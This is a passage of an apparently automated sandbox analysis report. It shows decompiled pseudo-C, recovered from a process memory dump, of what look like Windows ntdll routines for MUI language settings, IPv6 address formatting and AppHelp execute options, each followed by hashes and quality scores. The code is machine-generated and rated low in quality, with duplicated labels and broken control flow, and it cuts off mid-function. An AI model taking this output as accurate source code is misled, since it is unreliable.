                                                                                                                                                                					_t314 = E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                					_push(_t333);
                                                                                                                                                                					_v8 = _t318;
                                                                                                                                                                					E00B5718A(_t314);
                                                                                                                                                                					_t335 = _t335 + 4;
                                                                                                                                                                				}
                                                                                                                                                                				_t216 = E00B58460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                                				_t332 = ";";
                                                                                                                                                                				if(_t216 < 0) {
                                                                                                                                                                					L17:
                                                                                                                                                                					if(E00B58460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                						L30:
                                                                                                                                                                						if(E00B58460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                                							L46:
                                                                                                                                                                							_t329 = 0;
                                                                                                                                                                							L47:
                                                                                                                                                                							if(_v8 != _t318) {
                                                                                                                                                                								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                							}
                                                                                                                                                                							if(_v28 != _t318) {
                                                                                                                                                                								if(_v20 != _t318) {
                                                                                                                                                                									E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                									_v20 = _t318;
                                                                                                                                                                									_v40 = _t318;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							goto L49;
                                                                                                                                                                						}
                                                                                                                                                                						_t231 = _v24;
                                                                                                                                                                						_t322 = _t231 + 4;
                                                                                                                                                                						_push(_t231);
                                                                                                                                                                						_v52 = _t322;
                                                                                                                                                                						E00B5718A(_t231);
                                                                                                                                                                						if(_t322 == _t318) {
                                                                                                                                                                							_v32 = _t318;
                                                                                                                                                                						} else {
                                                                                                                                                                							_v32 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                						}
                                                                                                                                                                						if(_v32 == _t318) {
                                                                                                                                                                							_v52 = _t318;
                                                                                                                                                                							L58:
                                                                                                                                                                							_t329 = 0xc0000017;
                                                                                                                                                                							goto L47;
                                                                                                                                                                						} else {
                                                                                                                                                                							E00B32340(_v32, _v8, _v24);
                                                                                                                                                                							_v16 = _v32;
                                                                                                                                                                							_a4 = _t318;
                                                                                                                                                                							_t235 = E00B4E679(_v32, _t332);
                                                                                                                                                                							while(1) {
                                                                                                                                                                								_t319 = _t235;
                                                                                                                                                                								if(_t319 == 0) {
                                                                                                                                                                									break;
                                                                                                                                                                								}
                                                                                                                                                                								 *_t319 = 0;
                                                                                                                                                                								_t321 = _t319 + 2;
                                                                                                                                                                								E00B3E2A8(_t322,  &_v68, _v16);
                                                                                                                                                                								if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                									_a4 = _a4 + 1;
                                                                                                                                                                								}
                                                                                                                                                                								_v16 = _t321;
                                                                                                                                                                								_t235 = E00B4E679(_t321, _t332);
                                                                                                                                                                								_pop(_t322);
                                                                                                                                                                							}
                                                                                                                                                                							_t236 = _v16;
                                                                                                                                                                							if( *_v16 != _t319) {
                                                                                                                                                                								E00B3E2A8(_t322,  &_v68, _t236);
                                                                                                                                                                								if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                									_a4 = _a4 + 1;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							if(_a4 == 0) {
                                                                                                                                                                								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                                								_v52 = _v52 & 0x00000000;
                                                                                                                                                                								_v32 = _v32 & 0x00000000;
                                                                                                                                                                							}
                                                                                                                                                                							if(_v8 != 0) {
                                                                                                                                                                								E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                                							}
                                                                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                                                                							_t318 = 0;
                                                                                                                                                                							goto L46;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_t257 = _v24;
                                                                                                                                                                					_t322 = _t257 + 4;
                                                                                                                                                                					_push(_t257);
                                                                                                                                                                					_v40 = _t322;
                                                                                                                                                                					E00B5718A(_t257);
                                                                                                                                                                					_t338 = _t335 + 4;
                                                                                                                                                                					if(_t322 == _t318) {
                                                                                                                                                                						_v20 = _t318;
                                                                                                                                                                					} else {
                                                                                                                                                                						_v20 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                					}
                                                                                                                                                                					if(_v20 == _t318) {
                                                                                                                                                                						_v40 = _t318;
                                                                                                                                                                						goto L58;
                                                                                                                                                                					} else {
                                                                                                                                                                						E00B32340(_v20, _v8, _v24);
                                                                                                                                                                						_v16 = _v20;
                                                                                                                                                                						_a4 = _t318;
                                                                                                                                                                						_t261 = E00B4E679(_v20, _t332);
                                                                                                                                                                						_t335 = _t338 + 0x14;
                                                                                                                                                                						while(1) {
                                                                                                                                                                							_v12 = _t261;
                                                                                                                                                                							if(_t261 == _t318) {
                                                                                                                                                                								break;
                                                                                                                                                                							}
                                                                                                                                                                							_v12 = _v12 + 2;
                                                                                                                                                                							 *_v12 = 0;
                                                                                                                                                                							E00B3E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                							if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                                							}
                                                                                                                                                                							_v16 = _v12;
                                                                                                                                                                							_t261 = E00B4E679(_v12, _t332);
                                                                                                                                                                							_pop(_t322);
                                                                                                                                                                						}
                                                                                                                                                                						_t269 = _v16;
                                                                                                                                                                						if( *_v16 != _t318) {
                                                                                                                                                                							E00B3E2A8(_t322,  &_v68, _t269);
                                                                                                                                                                							if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						if(_a4 == _t318) {
                                                                                                                                                                							E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                                							_v40 = _t318;
                                                                                                                                                                							_v20 = _t318;
                                                                                                                                                                						}
                                                                                                                                                                						if(_v8 != _t318) {
                                                                                                                                                                							E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                						}
                                                                                                                                                                						_v8 = _t318;
                                                                                                                                                                						goto L30;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				_t284 = _v24;
                                                                                                                                                                				_t322 = _t284 + 4;
                                                                                                                                                                				_push(_t284);
                                                                                                                                                                				_v48 = _t322;
                                                                                                                                                                				E00B5718A(_t284);
                                                                                                                                                                				_t339 = _t335 + 4;
                                                                                                                                                                				if(_t322 == _t318) {
                                                                                                                                                                					_v28 = _t318;
                                                                                                                                                                				} else {
                                                                                                                                                                					_v28 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                                				}
                                                                                                                                                                				if(_v28 == _t318) {
                                                                                                                                                                					_v48 = _t318;
                                                                                                                                                                					goto L58;
                                                                                                                                                                				} else {
                                                                                                                                                                					E00B32340(_v28, _v8, _v24);
                                                                                                                                                                					_v16 = _v28;
                                                                                                                                                                					_a4 = _t318;
                                                                                                                                                                					_t288 = E00B4E679(_v28, _t332);
                                                                                                                                                                					_t335 = _t339 + 0x14;
                                                                                                                                                                					while(1) {
                                                                                                                                                                						_v12 = _t288;
                                                                                                                                                                						if(_t288 == _t318) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						_v12 = _v12 + 2;
                                                                                                                                                                						 *_v12 = 0;
                                                                                                                                                                						E00B3E2A8(_v12,  &_v68, _v16);
                                                                                                                                                                						if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                							_a4 = _a4 + 1;
                                                                                                                                                                						}
                                                                                                                                                                						_v16 = _v12;
                                                                                                                                                                						_t288 = E00B4E679(_v12, _t332);
                                                                                                                                                                						_pop(_t322);
                                                                                                                                                                					}
                                                                                                                                                                					_t296 = _v16;
                                                                                                                                                                					if( *_v16 != _t318) {
                                                                                                                                                                						E00B3E2A8(_t322,  &_v68, _t296);
                                                                                                                                                                						if(E00B55553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                                							_a4 = _a4 + 1;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					if(_a4 == _t318) {
                                                                                                                                                                						E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                                						_v48 = _t318;
                                                                                                                                                                						_v28 = _t318;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v8 != _t318) {
                                                                                                                                                                						E00B3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                                					}
                                                                                                                                                                					_v8 = _t318;
                                                                                                                                                                					goto L17;
                                                                                                                                                                				}
                                                                                                                                                                			}





































                                                                                                                                                                0x00ba1bf8
                                                                                                                                                                0x00ba1c0e
                                                                                                                                                                0x00ba1c13
                                                                                                                                                                0x00ba1c16
                                                                                                                                                                0x00ba1c16
                                                                                                                                                                0x00ba1bf8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58b04
                                                                                                                                                                0x00b58a0e
                                                                                                                                                                0x00b58a11
                                                                                                                                                                0x00b58a14
                                                                                                                                                                0x00b58a15
                                                                                                                                                                0x00b58a18
                                                                                                                                                                0x00b58a22
                                                                                                                                                                0x00b58b59
                                                                                                                                                                0x00b58a28
                                                                                                                                                                0x00b58a3c
                                                                                                                                                                0x00b58a3c
                                                                                                                                                                0x00b58a42
                                                                                                                                                                0x00ba1bb0
                                                                                                                                                                0x00ba1b11
                                                                                                                                                                0x00ba1b11
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58a48
                                                                                                                                                                0x00b58a51
                                                                                                                                                                0x00b58a5b
                                                                                                                                                                0x00b58a5e
                                                                                                                                                                0x00b58a61
                                                                                                                                                                0x00b58a69
                                                                                                                                                                0x00b58a69
                                                                                                                                                                0x00b58a6d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58a74
                                                                                                                                                                0x00b58a7c
                                                                                                                                                                0x00b58a7d
                                                                                                                                                                0x00b58a91
                                                                                                                                                                0x00b58a93
                                                                                                                                                                0x00b58a93
                                                                                                                                                                0x00b58a98
                                                                                                                                                                0x00b58a9b
                                                                                                                                                                0x00b58aa1
                                                                                                                                                                0x00b58aa1
                                                                                                                                                                0x00b58aa4
                                                                                                                                                                0x00b58aaa
                                                                                                                                                                0x00b58ab1
                                                                                                                                                                0x00b58ac5
                                                                                                                                                                0x00b58ac7
                                                                                                                                                                0x00b58ac7
                                                                                                                                                                0x00b58ac5
                                                                                                                                                                0x00b58ace
                                                                                                                                                                0x00ba1bc9
                                                                                                                                                                0x00ba1bce
                                                                                                                                                                0x00ba1bd2
                                                                                                                                                                0x00ba1bd2
                                                                                                                                                                0x00b58ad8
                                                                                                                                                                0x00b58aeb
                                                                                                                                                                0x00b58aeb
                                                                                                                                                                0x00b58af0
                                                                                                                                                                0x00b58af4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58af4
                                                                                                                                                                0x00b58a42
                                                                                                                                                                0x00b58926
                                                                                                                                                                0x00b58929
                                                                                                                                                                0x00b5892c
                                                                                                                                                                0x00b5892d
                                                                                                                                                                0x00b58930
                                                                                                                                                                0x00b58935
                                                                                                                                                                0x00b5893a
                                                                                                                                                                0x00b58b51
                                                                                                                                                                0x00b58940
                                                                                                                                                                0x00b58954
                                                                                                                                                                0x00b58954
                                                                                                                                                                0x00b5895a
                                                                                                                                                                0x00ba1b63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58960
                                                                                                                                                                0x00b58969
                                                                                                                                                                0x00b58973
                                                                                                                                                                0x00b58976
                                                                                                                                                                0x00b58979
                                                                                                                                                                0x00b5897e
                                                                                                                                                                0x00b58981
                                                                                                                                                                0x00b58981
                                                                                                                                                                0x00b58986
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00ba1b6e
                                                                                                                                                                0x00ba1b74
                                                                                                                                                                0x00ba1b7b
                                                                                                                                                                0x00ba1b8f
                                                                                                                                                                0x00ba1b91
                                                                                                                                                                0x00ba1b91
                                                                                                                                                                0x00ba1b99
                                                                                                                                                                0x00ba1b9c
                                                                                                                                                                0x00ba1ba2
                                                                                                                                                                0x00ba1ba2
                                                                                                                                                                0x00b5898c
                                                                                                                                                                0x00b58992
                                                                                                                                                                0x00b58999
                                                                                                                                                                0x00b589ad
                                                                                                                                                                0x00ba1ba8
                                                                                                                                                                0x00ba1ba8
                                                                                                                                                                0x00b589ad
                                                                                                                                                                0x00b589b6
                                                                                                                                                                0x00b589c8
                                                                                                                                                                0x00b589cd
                                                                                                                                                                0x00b589d0
                                                                                                                                                                0x00b589d0
                                                                                                                                                                0x00b589d6
                                                                                                                                                                0x00b589e8
                                                                                                                                                                0x00b589e8
                                                                                                                                                                0x00b589ed
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b589ed
                                                                                                                                                                0x00b5895a
                                                                                                                                                                0x00b5883e
                                                                                                                                                                0x00b58841
                                                                                                                                                                0x00b58844
                                                                                                                                                                0x00b58845
                                                                                                                                                                0x00b58848
                                                                                                                                                                0x00b5884d
                                                                                                                                                                0x00b58852
                                                                                                                                                                0x00b58b49
                                                                                                                                                                0x00b58858
                                                                                                                                                                0x00b5886c
                                                                                                                                                                0x00b5886c
                                                                                                                                                                0x00b58872
                                                                                                                                                                0x00ba1b0e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58878
                                                                                                                                                                0x00b58881
                                                                                                                                                                0x00b5888b
                                                                                                                                                                0x00b5888e
                                                                                                                                                                0x00b58891
                                                                                                                                                                0x00b58896
                                                                                                                                                                0x00b58899
                                                                                                                                                                0x00b58899
                                                                                                                                                                0x00b5889e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00ba1b21
                                                                                                                                                                0x00ba1b27
                                                                                                                                                                0x00ba1b2e
                                                                                                                                                                0x00ba1b42
                                                                                                                                                                0x00ba1b44
                                                                                                                                                                0x00ba1b44
                                                                                                                                                                0x00ba1b4c
                                                                                                                                                                0x00ba1b4f
                                                                                                                                                                0x00ba1b55
                                                                                                                                                                0x00ba1b55
                                                                                                                                                                0x00b588a4
                                                                                                                                                                0x00b588aa
                                                                                                                                                                0x00b588b1
                                                                                                                                                                0x00b588c5
                                                                                                                                                                0x00ba1b5b
                                                                                                                                                                0x00ba1b5b
                                                                                                                                                                0x00b588c5
                                                                                                                                                                0x00b588ce
                                                                                                                                                                0x00b588e0
                                                                                                                                                                0x00b588e5
                                                                                                                                                                0x00b588e8
                                                                                                                                                                0x00b588e8
                                                                                                                                                                0x00b588ee
                                                                                                                                                                0x00b58900
                                                                                                                                                                0x00b58900
                                                                                                                                                                0x00b58905
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58905

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 00B589FC
                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 00B58914
                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 00B587E6
                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 00B58827
                                                                                                                                                                • WindowsExcludedProcs, xrefs: 00B587C1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcspbrk
                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                • API String ID: 402402107-258546922
                                                                                                                                                                • Opcode ID: ad0f9ad0cc54f5f7c18a4a8ca2a3fd27d9f6101e6f2917ecea5988ecf7228a67
                                                                                                                                                                • Instruction ID: 20a2520b83cf2399e17c804b50615350ed1fabb73089bcbdc62a60321fa9bddf
                                                                                                                                                                • Opcode Fuzzy Hash: ad0f9ad0cc54f5f7c18a4a8ca2a3fd27d9f6101e6f2917ecea5988ecf7228a67
                                                                                                                                                                • Instruction Fuzzy Hash: 36F1C5B2D00209EFCF51DF95C981AEEB7F8FB08301F2444EAE915A7251EB359A45DB60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                			E00B713CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                				char _v8;
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				intOrPtr* _v16;
                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                				signed int _t78;
                                                                                                                                                                				signed int _t86;
                                                                                                                                                                				char _t90;
                                                                                                                                                                				signed int _t91;
                                                                                                                                                                				signed int _t96;
                                                                                                                                                                				intOrPtr _t108;
                                                                                                                                                                				signed int _t114;
                                                                                                                                                                				void* _t115;
                                                                                                                                                                				intOrPtr _t128;
                                                                                                                                                                				intOrPtr* _t129;
                                                                                                                                                                				void* _t130;
                                                                                                                                                                
                                                                                                                                                                				_t129 = _a4;
                                                                                                                                                                				_t128 = _a8;
                                                                                                                                                                				_t116 = 0;
                                                                                                                                                                				_t71 = _t128 + 0x5c;
                                                                                                                                                                				_v8 = 8;
                                                                                                                                                                				_v20 = _t71;
                                                                                                                                                                				if( *_t129 == 0) {
                                                                                                                                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                						goto L5;
                                                                                                                                                                					} else {
                                                                                                                                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                						if(_t96 != 0) {
                                                                                                                                                                							L38:
                                                                                                                                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                								goto L5;
                                                                                                                                                                							} else {
                                                                                                                                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                								_t86 = E00B67707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                								L36:
                                                                                                                                                                								return _t128 + _t86 * 2;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                						if(_t114 == 0) {
                                                                                                                                                                							L33:
                                                                                                                                                                							_t115 = 0xb32926;
                                                                                                                                                                							L35:
                                                                                                                                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                							_t86 = E00B67707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                							goto L36;
                                                                                                                                                                						}
                                                                                                                                                                						if(_t114 != 0xffff) {
                                                                                                                                                                							_t116 = 0;
                                                                                                                                                                							goto L38;
                                                                                                                                                                						}
                                                                                                                                                                						if(_t114 != 0) {
                                                                                                                                                                							_t115 = 0xb39cac;
                                                                                                                                                                							goto L35;
                                                                                                                                                                						}
                                                                                                                                                                						goto L33;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L5:
                                                                                                                                                                					_a8 = _t116;
                                                                                                                                                                					_a4 = _t116;
                                                                                                                                                                					_v12 = _t116;
                                                                                                                                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                							_v8 = 6;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_t90 = _v8;
                                                                                                                                                                					if(_t90 <= _t116) {
                                                                                                                                                                						L11:
                                                                                                                                                                						if(_a8 - _a4 <= 1) {
                                                                                                                                                                							_a8 = _t116;
                                                                                                                                                                							_a4 = _t116;
                                                                                                                                                                						}
                                                                                                                                                                						_t91 = 0;
                                                                                                                                                                						if(_v8 <= _t116) {
                                                                                                                                                                							L22:
                                                                                                                                                                							if(_v8 < 8) {
                                                                                                                                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                								_t128 = _t128 + E00B67707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                							}
                                                                                                                                                                							return _t128;
                                                                                                                                                                						} else {
                                                                                                                                                                							L14:
                                                                                                                                                                							L14:
                                                                                                                                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                									_push(":");
                                                                                                                                                                									_push(_t71 - _t128 >> 1);
                                                                                                                                                                									_push(_t128);
                                                                                                                                                                									_t128 = _t128 + E00B67707() * 2;
                                                                                                                                                                									_t71 = _v20;
                                                                                                                                                                									_t130 = _t130 + 0xc;
                                                                                                                                                                								}
                                                                                                                                                                								_t78 = E00B67707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                								_t130 = _t130 + 0x10;
                                                                                                                                                                							} else {
                                                                                                                                                                								_push(L"::");
                                                                                                                                                                								_push(_t71 - _t128 >> 1);
                                                                                                                                                                								_push(_t128);
                                                                                                                                                                								_t78 = E00B67707();
                                                                                                                                                                								_t130 = _t130 + 0xc;
                                                                                                                                                                								_t91 = _a8 - 1;
                                                                                                                                                                							}
                                                                                                                                                                							_t91 = _t91 + 1;
                                                                                                                                                                							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                							_t71 = _v20;
                                                                                                                                                                							if(_t91 >= _v8) {
                                                                                                                                                                								goto L22;
                                                                                                                                                                							}
                                                                                                                                                                							_t116 = 0;
                                                                                                                                                                							goto L14;
                                                                                                                                                                						}
                                                                                                                                                                					} else {
                                                                                                                                                                						_t108 = 1;
                                                                                                                                                                						_v16 = _t129;
                                                                                                                                                                						_v24 = _t90;
                                                                                                                                                                						do {
                                                                                                                                                                							if( *_v16 == _t116) {
                                                                                                                                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                									_a4 = _v12;
                                                                                                                                                                									_a8 = _t108;
                                                                                                                                                                								}
                                                                                                                                                                								_t116 = 0;
                                                                                                                                                                							} else {
                                                                                                                                                                								_v12 = _t108;
                                                                                                                                                                							}
                                                                                                                                                                							_v16 = _v16 + 2;
                                                                                                                                                                							_t108 = _t108 + 1;
                                                                                                                                                                							_t26 =  &_v24;
                                                                                                                                                                							 *_t26 = _v24 - 1;
                                                                                                                                                                						} while ( *_t26 != 0);
                                                                                                                                                                						goto L11;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                			}





















Memory Dump Source
• Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
• Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                • Opcode ID: 33e8cfd4deaeee41480564ac8807a593a71b9e2a4725a3cecff008517d550b49
                                                                                                                                                                • Instruction ID: 9cc91461d99c313d92ded62873d11f50b181bbadb5abd0af392c0baa5b5a8fdd
                                                                                                                                                                • Opcode Fuzzy Hash: 33e8cfd4deaeee41480564ac8807a593a71b9e2a4725a3cecff008517d550b49
                                                                                                                                                                • Instruction Fuzzy Hash: 0A6125B1904655AACF34CF5DC8818BEBBF5EF94300B64C9ADF4AA47641D674AA40CB70
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E00B67EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				char _v540;
                                                                                                                                                                				unsigned int _v544;
                                                                                                                                                                				signed int _v548;
                                                                                                                                                                				intOrPtr _v552;
                                                                                                                                                                				char _v556;
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t33;
                                                                                                                                                                				void* _t38;
                                                                                                                                                                				unsigned int _t46;
                                                                                                                                                                				unsigned int _t47;
                                                                                                                                                                				unsigned int _t52;
                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                				unsigned int _t62;
                                                                                                                                                                				void* _t69;
                                                                                                                                                                				void* _t70;
                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                				signed int _t73;
                                                                                                                                                                				void* _t74;
                                                                                                                                                                				void* _t75;
                                                                                                                                                                				void* _t76;
                                                                                                                                                                				void* _t77;
                                                                                                                                                                
                                                                                                                                                                				_t33 =  *0xc12088; // 0x776ba9e3
                                                                                                                                                                				_v8 = _t33 ^ _t73;
                                                                                                                                                                				_v548 = _v548 & 0x00000000;
                                                                                                                                                                				_t72 = _a4;
                                                                                                                                                                				if(E00B67F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                					__eflags = _v548;
                                                                                                                                                                					if(_v548 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_t62 = _t72 + 0x24;
                                                                                                                                                                					E00B83F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                					_t71 = 0x214;
                                                                                                                                                                					_v544 = 0x214;
                                                                                                                                                                					E00B3DFC0( &_v540, 0, 0x214);
                                                                                                                                                                					_t75 = _t74 + 0x20;
                                                                                                                                                                					_t46 =  *0xc14218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                					__eflags = _t46;
                                                                                                                                                                					if(_t46 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_t47 = _v544;
                                                                                                                                                                					__eflags = _t47;
                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					__eflags = _t47 - 0x214;
                                                                                                                                                                					if(_t47 >= 0x214) {
                                                                                                                                                                						goto L1;
                                                                                                                                                                					}
                                                                                                                                                                					_push(_t62);
                                                                                                                                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                					E00B83F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                					_t52 = E00B40D27( &_v540, L"Execute=1");
                                                                                                                                                                					_t76 = _t75 + 0x1c;
                                                                                                                                                                					_push(_t62);
                                                                                                                                                                					__eflags = _t52;
